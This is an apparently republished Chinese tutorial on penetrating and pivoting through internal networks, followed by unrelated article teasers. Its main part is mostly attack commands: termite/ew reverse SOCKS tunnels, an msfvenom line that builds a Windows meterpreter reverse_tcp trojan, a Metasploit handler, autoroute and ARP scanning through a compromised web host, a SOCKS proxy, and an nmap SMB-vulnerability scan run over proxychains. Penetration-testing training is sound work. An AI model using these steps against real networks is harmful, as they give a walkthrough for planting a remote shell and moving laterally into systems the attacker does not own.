内网安全-内网穿透

目录

内网渗透

Nc使用详解

Nc监听和探测

Nc传文件

termite内网穿透工具

ssh代理内网穿透

ssh配置socket代理

MSF多级网络穿透

内网渗透

Nc使用详解
Nc监听和探测

Nc传文件

termite内网穿透工具

1、termite 之前叫ew    (可以进行正向连接,可以进行反向连接)
​
2、
靶机监听流量转发:./ew_for_linux64 -s rcsocks -l 1111 -e 2222#将1111端口监听到的本地数据转发到 web服务器的2222端口# 通过1111端口,将本地流量转发出去#rcsocks、rssocks 用于反向连接#ssocks 用于正向连接# -l 指定本地监听的端口# -e 指定要反弹到的机器端口# -d 指定要反弹到机器的IP# -f 指定要主动连接的机器 ip# -g 指定要主动连接的机器端口# -t 指定超时时长,默认为 1000root@ubuntu:/tmp# ./ew_for_linux64 -s rssocks -d lhost -e 2222
rssocks 192.168.12.128:2222 <--[10000 usec]--> socks server
​
监听机的流量转发:
#将流量通过2222端口传到192.168.16.128主机上
#rcsocks、rssocks 用于反向连接#ssocks 用于正向连接# -l 指定本地监听的端口# -e 指定要反弹到的机器端口# -d 指定要反弹到机器的IP# -f 指定要主动连接的机器 ip# -g 指定要主动连接的机器端口# -t 指定超时时长,默认为 10003、windows和linux差不多!
ssh代理内网穿透

正向代理就是利用已经控制的主机来控制更多的主机,主机可能存在内网网卡,可以通过内网穿透工具来控制内网主机! ​ 反向代理就是在本地开启一个端口,通过ssh服务把端口映射到跳板机的ssh服务器的内网ip端口上,这样内网主机就可以直接访问我们本地主机服务!
ssh配置socket代理

1、当然我们需要在 /etc/proxychains4.conf 文件里面修改代理端口
我们就可以直接使用本地流量进行攻击!┌──(root㉿ru)-[~/kali]
└─# cat /etc/proxychains4.conf | grep "socks" | tail -1
socks5  127.0.0.1 8081代理完成之后就可以使用本地流量进行内网信息收集了
MSF多级网络穿透

1、可以先控制web主机。直接生成监听木马,然后利用web主机的漏洞从而获取到meterpreter!
msfvenom -p windwos/meterpreter/reverse_tcp lhost=本地监听IP lport=本地监听端口 -f exe > shell.exe
-p:指定payload
-f:指定生成木马类型2、msfconsole 监听模块
use exploit/multi/handler
set payload windwos/meterpreter/reverse_tcp
set lhost 本地监听IP
set lport 本地监听端口  (这几个参数要和生成的木马一样!!)
在web主机上运行shell.exe即可!3、添加内网静态路由
run autoroute -s 内网IP网段
然后就可以扫描该网段了
run post/windwos/gather/arp_scanner RHOSTS=内网IP网段
当然我们也可以使用msf自带的端口扫描模块(auxiliary/scanner/portscan/tcp)4、socks5代理
如果我们想在本地使用扫描器来进行内网信息收集,我们就可以利用msf的socks5代理设置,前提是我们已经拿到了web主机的meterpreter了!
use auxiliary/server/socks_unc
set srvhost 127.0.0.1
set srvport 1234
run┌──(root㉿ru)-[~/kali]
└─# netstat -tnlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:45163         0.0.0.0:*               LISTEN      1150/containerd
tcp        0      0 0.0.0.0:1234            0.0.0.0:*               LISTEN      19399/ruby
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1174/sshd: /usr/sbi
tcp6       0      0 :::22┌──(root㉿ru)-[~/kali]
└─# cat /etc/proxychains4.conf | grep "socks5" | tail -1
socks5  127.0.0.1 1234这样我们就搞定了
nmap:
proxychains4 nmap -sT -sV -Pn -n -p 22,80,135,139,3389,445  --script=smb-vuln-ms* 内网IP  (正向扫描)在此之后,我们再次进行msf漏洞攻击的时候就必须使用正向的payload了!











本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/465242.html


如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!












相关文章










读千脑智能笔记11_保存人类遗产








读千脑智能笔记11_保存人类遗产




1. 智能生物通常能延续多久 
1.1. SETI和METI计划的可行性在很大程度上取决于智能生物通常能延续多久 
1.1.1. 搜寻地外文明&#xff08;以下简称SETI&#xff09;计划的目标 
1.1.1.1. 这是一个力图寻找宇宙其他地方智能生物存在证据的研究项目 
1.1.1.2. SETI计划旨在寻找含有…




阅读更多...

















mac卸载被锁定的app








mac卸载被锁定的app




sudo chflags -hv noschg /Applications/YunShu.app 参考&#xff1a;卸载云枢&#xff08;MacOS 版&#xff09;




阅读更多...

















Java的接口








Java的接口




目录 
1.接口的概念 
2.语法规则 3.接口的使用 4.接口的特性 
总结&#xff1a; 
5.实现多个接口 
6.接口间的继承 1.接口的概念 
接口就是公共的行为规范标准&#xff0c;大家在实现时&#xff0c;只要符合规范标准&#xff0c;就可以通用。 在Java中&#xff0c;接口可以看成…




阅读更多...

















Deepin基本环境查看(九)【被封印的创世神】








Deepin基本环境查看(九)【被封印的创世神】




文章目录 - 相关文章目录1、概述2、Deepin中的创世神和管理员1&#xff09;创世神root2&#xff09;root被封印原因3&#xff09;其他的神灵【管理员】 3、神殿管理【su与sudo】1&#xff09;su&#xff08;Switch User&#xff09;2&#xff09;sudo&#xff08;Superuser Do&…




阅读更多...

















centos间文件传输








centos间文件传输




scp /home/vagrant/minio zx192.168.56.34:/home/zx 
/home/vagrant/minio 是你要传输的文件而且是当前机器登录用户有权限操作的文件 
zx是目标机器的用户192.168.56.34是目标机器的地址 /home/zx是要传到这个文件夹下 
要确保zx有/home/zx这个文件夹的操作权限 本质就是ssh文…




阅读更多...

















LeetCode Python -8.字符串转整数








LeetCode Python -8.字符串转整数




文章目录 题目答案运行结果 题目 
请你来实现一个 myAtoi(string s) 函数&#xff0c;使其能将字符串转换成一个 32 位有符号整数&#xff08;类似 C/C 中的 atoi 函数&#xff09;。 
函数 myAtoi(string s) 的算法如下&#xff1a; 
读入字符串并丢弃无用的前导空格检查下一个…




阅读更多...

















如何把手机平板变为电脑的屏幕








如何把手机平板变为电脑的屏幕




文章目录 安装软件运行效果结尾 本文首发地址 https://h89.cn/archives/181.html 最新更新地址 https://gitee.com/chenjim/chenjimblog 闲置的手机平板、触屏音箱等&#xff0c;均可作为电脑的扩展屏&#xff0c;为电脑增加一块显示屏&#xff0c;本文介绍如何使用免费的软件s…




阅读更多...

















python基于flask的网上订餐系统769b9-django+vue








python基于flask的网上订餐系统769b9-django+vue




课题主要分为两大模块&#xff1a;即管理员模块和用户模块&#xff0c;主要功能包括个人中心、用户管理、菜品类型管理、菜品信息管理、留言反馈、在线交流、系统管理、订单管理等&#xff1b;  如果用户想要交换信息&#xff0c;他们需要满足双方交换信息的需要。由于时间有限…




阅读更多...

















通过Dynamo删除Revit中族参数探究








通过Dynamo删除Revit中族参数探究




起因是这样的&#xff0c;有位同事想在项目中直接删除revit族的参数&#xff0c;而不打开族&#xff0c;避免因为重载族&#xff0c;造成一些管件连接断开&#xff0c;于是就有了下面这些研究&#xff0c;当然是因为我没办法实现这个想法&#xff0c;所以这次可以分享下研究的过…




阅读更多...

















AI:125-基于深度学习的航拍图像中地物变化检测








AI:125-基于深度学习的航拍图像中地物变化检测




🚀点击这里跳转到本专栏,可查阅专栏顶置最新的指南宝典~   
🎉🎊🎉 你的技术旅程将在这里启航! 从基础到实践,深入学习。无论你是初学者还是经验丰富的老手,对于本专栏案例和项目实践都有参考学习意义。 ✨✨✨ 每一个案例都附带有在本地跑过的关键代码,详细讲解供…




阅读更多...

















揭秘 LLM 推理:全面解析 LLM 推理性能的关键因素








揭秘 LLM 推理:全面解析 LLM 推理性能的关键因素




一、背景介绍 
自 OpenAI 一年前发布 ChatGPT 以来&#xff0c;大型语言模型&#xff08;LLM&#xff09;领域经历了前所未有的快速发展。在短短一年时间内&#xff0c;涌现出了数以百计的 LLM 模型&#xff0c;包括开源模型如 LLaMA、Mistral、Yi、Baichuan、Qwen&#xff0c;…




阅读更多...

















操作系统——死锁








操作系统——死锁




1.什么是死锁&#xff1f; 
死锁就是多个进程或线程被阻塞&#xff0c;它们同时占用着对方所需的资源不放&#xff0c;僵持不下一直阻塞的情况。 
2.说一下产生死锁的四个必要条件&#xff1f; 互斥&#xff1a;这个资源一次只有一个进程可以使用&#xff0c;比如锁。  占用并等…




阅读更多...


















推荐文章












最新文章


















Copyright @ 2022~2023